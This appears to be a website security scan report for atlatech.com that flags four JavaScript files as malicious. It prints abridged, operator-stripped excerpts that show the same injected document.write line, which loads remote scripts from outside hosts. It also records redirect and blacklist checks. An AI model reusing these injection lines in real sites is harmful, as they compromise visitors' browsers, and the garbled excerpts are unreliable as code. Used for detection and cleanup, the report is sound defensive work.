Scanned pages/files
Request | Server response | Status |
http://www.atlatech.com/ | 200 OK Content-Length: 40180 Content-Type: text/html | clean |
http://www.atlatech.com/js/tab-view.js | 200 OK Content-Length: 11083 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var textPadding = 3; var strictDocType = true; var tabView_maxNumberOfTabs = 6; var tab_view_tabObj = new Array(); var activeTabIndex = new Array(); var MSIE = navigator.userAgent.indexOf('MSIE')>=0?true:false; var regExp = new RegExp(".*MSIE ([0-9]\.[0-9]).*","g"); var navigatorVersion = navigator.userAgent.replace(regExp,'$1'); var ajaxObjects = new Array(); var tabView_countTabs = new Array(); var tabViewHeight = new Array( var obj2 = document.getElementById('tabView' parentId '_' tabIndex); obj2.parentNode.removeChild(obj2); resetTabIds(parentId); activeTabIndex[parentId]=-1; showTab(parentId,'0'); } } } *339810*/ document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://184.168.41.108/justhispanic/sYi63pYS.php" type="text/javascript"></script>') Antivirus reports:
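(No antivirus detection rows are present in this copy of the report.) In the excerpt above, the tab-view library code ends at the `*339810*/` marker; the `document.write(...)` call appended after it is the injected part, and it makes every page that includes tab-view.js load a script from 184.168.41.108. The excerpt is abridged (it breaks off at `new Array(`) and has lost its `+` operators, so compare against the file on the server rather than this text. The same marker and `gwloaded` stub appear in every file flagged below, so searching the site's files for either string should locate other modified files.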
http://www.atlatech.com/../ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://www.atlatech.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.atlatech.com/templates/stepcarousel.js | 200 OK Content-Length: 18281 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict() var stepcarousel={ ajaxloadingmsg: '<div style="margin: 1em; font-weight: bold"><img src="ajaxloadr.gif" style="vertical-align: middle" /> Fetching Content. Please wait...</div>', defaultbuttonsfade: 0.4, configholder: {}, getCSSValue:function(val){ return (val=="auto")? 0 : parseInt(val) }, getremotepanels:function($, config){ config.$belt.html(this.ajaxloadingmsg) $.ajax({ url: config.contenttype[1], async: tru if (config.panelbehavior.persist) stepcarousel.setCookie(config.galleryid "persist", config.currentpanel) jQuery.each(config, function(ai, oi){ oi=null }) config=null }) } } *339810*/ document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://datingsecretsfordivorcedwomen.com/video/ZtKGaCMp.php" type="text/javascript"></script>') Antivirus reports:
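(No antivirus detection rows are present in this copy of the report.) In the excerpt above, the stepcarousel code ends at the `*339810*/` marker; the appended `document.write(...)` call is the injected part and loads a script from datingsecretsfordivorcedwomen.com. The excerpt is abridged (it breaks off at `async: tru`), so it does not show the whole 18281-byte file.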
http://www.atlatech.com/templates/jquery.js | 200 OK Content-Length: 54280 Content-Type: application/javascript | clean |
http://www.atlatech.com/templates/jquery.droppy.js | 200 OK Content-Length: 1742 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $.fn.droppy = function(options) { options = $.extend({speed: 1}, options || {}); this.each(function() { var root = this, zIndex = 1000; function getSubnav(ele) { if (ele.nodeName.toLowerCase() == 'li') { var subnav = $('> ul', ele); return subnav.length ? subnav[0] : null; } else { return ele; } } function getActuator(ele) { if (ele $('li', this).hover( function() { $(this).addClass('hover'); $('> a', this).addClass('hover'); }, function() { $(this).removeClass('hover'); $('> a', this).removeClass('hover'); } ); }); }; *339810*/ document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://173.254.93.224/customerportal/FjbmNxnG.php" type="text/javascript"></script>') Antivirus reports:
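(No antivirus detection rows are present in this copy of the report.) In the excerpt above, the droppy plugin code ends at the `*339810*/` marker; the appended `document.write(...)` call is the injected part and loads a script from 173.254.93.224. The excerpt is abridged (it breaks off at `if (ele`).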
http://www.atlatech.com/templates/swfobject.js | 200 OK Content-Length: 6562 Content-Type: application/javascript | clean |
http://www.atlatech.com/jquery.js | 200 OK Content-Length: 630 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /jquery.js was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache/2.2.3 (Red Hat) Server at www.prism-solutions.com.au Port 80</address> </body></html> *339810*/ document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://datingsecretsfordivorcedwomen.com/video/ZtKGaCMp.php" type="text/javascript"></script>') Antivirus reports:
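(No antivirus detection rows are present in this copy of the report.) Note that the body returned for /jquery.js is not a script: it is an Apache "404 Not Found" page that names www.prism-solutions.com.au rather than atlatech.com, served with status 200 and Content-Type application/javascript, with the same `*339810*/` marker and injected `document.write(...)` call appended. The injection may therefore be applied at the server or hosting level rather than to a file on disk; this cannot be confirmed from the report alone.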
http://www.atlatech.com/" gaJsHost "google-analytics.com/ga.js | 404 Not Found Content-Length: 369 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: atlatech.com
Result: (not shown in this copy of the report)
Second query (visit from search engine):
GET / HTTP/1.1
Host: atlatech.com
Referer: http://www.google.com/search?q=atlatech.com
Result:
The result is similar to the first query. There are no suspicious redirects found. This check covers only the HTTP response to GET /; the scripts injected into the .js files listed above run in the visitor's browser and would not appear as a redirect here.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=atlatech.com
Result: This site is not currently listed as suspicious. (Not being listed does not mean the site is clean; the file scan above found injected scripts in four files.)
Query: http://yandex.com/infected?l10n=en&url=http://atlatech.com/
Result: atlatech.com is not infected or malware details are not published yet.